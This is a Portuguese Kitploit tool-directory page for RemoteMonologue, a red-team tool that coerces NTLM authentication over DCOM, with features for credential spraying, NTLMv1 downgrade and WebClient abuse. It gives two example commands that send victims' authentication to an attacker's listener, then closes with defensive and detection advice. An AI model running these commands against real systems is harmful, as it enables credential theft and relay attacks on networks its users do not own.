Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
RemoteMonologue — Transformando o DCOM em arma para coerções de autenticação NTLM | Kitploit
Ferramentas/GitHubGitHub/xforcered/remotemonologue
Ataques de SenhaExploraçãoMovimento LateralColeta de InformaçõesTestes de PenetraçãoRed Teaming
GitHubxforcered/remotemonologue

RemoteMonologue

Transformando o DCOM em arma para coerções de autenticação NTLM

Ver Repositório
2752213há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

RemoteMonologue

RemoteMonologue é uma técnica de captura de credenciais no Windows que possibilita o comprometimento remoto de usuários ao explorar a chave RunAs do usuário interativo (Interactive User) e forçar autenticações NTLM via DCOM.

Leia o RemoteMonologue: Weaponizing DCOM for NTLM Authentication Coercions da X-Force Red para obter informações detalhadas.

Recursos

🔹 Coerção de Autenticação via DCOM (-dcom)

  • Tem como alvo quatro objetos DCOM (ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession) para acionar uma autenticação NTLM contra um listener especificado (-auth-to).

🔹 Spray de Credenciais (-spray)

  • Valida credenciais em vários sistemas enquanto também captura credenciais de usuários.

🔹 Ataque de Rebaixamento NetNTLMv1 (-downgrade)

  • Força os alvos a usar NTLMv1, facilitando a quebra e o relaying de credenciais.

🔹 Abuso do Serviço WebClient (-webclient)

  • Ativa o serviço WebClient para facilitar a coerção de autenticação baseada em HTTP.

🔹 Enumeração de Usuários (-query)

  • Identifica usuários com sessão ativa no sistema alvo.

Observação: São necessários privilégios de administrador local no sistema alvo.

Configuração

pip install impacket

Exemplos

Abaixo está um exemplo de execução do RemoteMonologue com o ataque de rebaixamento NetNTLMv1 usando o Responder como listener. Por padrão, se nenhuma opção DCOM for especificada, a ferramenta usa o objeto DCOM ServerDataCollectorSet.

RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

image

Abaixo está outro exemplo; desta vez, o ataque é executado usando o objeto DCOM FileSystemImage e habilitando o serviço WebClient para obter uma autenticação HTTP, que é então retransmitida ao LDAP usando ntlmrelayx.

RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

image

Considerações Defensivas

Para proteger contra e detectar essas técnicas, há diversas medidas preventivas e de detecção que podem ser implementadas.

Medidas preventivas:

  1. Habilite a Assinatura LDAP e o vínculo de canal: configure a imposição de assinatura LDAP e vínculo de canal nos controladores de domínio para proteger o endpoint LDAP contra ataques de relay. Observação: essas configurações serão impostas por padrão a partir do Windows Server 2025.

  2. Atualize para as versões mais recentes do Windows: atualize os servidores para o Windows Server 2025 e as estações de trabalho para o Windows 11 versão 24H2 para mitigar ataques de rebaixamento NetNTLM, pois o NTLMv1 foi removido nessas versões.

  3. Imponha a Assinatura SMB: habilite e imponha a assinatura SMB nos servidores Windows para evitar ataques de relay SMB.

  4. Implemente políticas de senha fortes: imponha requisitos de senha fortes para tornar os ataques de quebra de senha mais difíceis.

Oportunidades de detecção:

  1. Monitore o acesso remoto a objetos DCOM: rastreie o acesso aos objetos DCOM afetados e às suas Propriedades e Métodos específicos para identificar atividades incomuns.

  2. Monitore modificações no registro: monitore alterações nas chaves de registro RunAs e LmCompatibilityLevel.

  3. Rastreie a atividade do serviço WebClient: monitore casos em que o serviço WebClient é habilitado remotamente, pois isso é usado para facilitar autenticações NTLM baseadas em HTTP.

Baixar ferramenta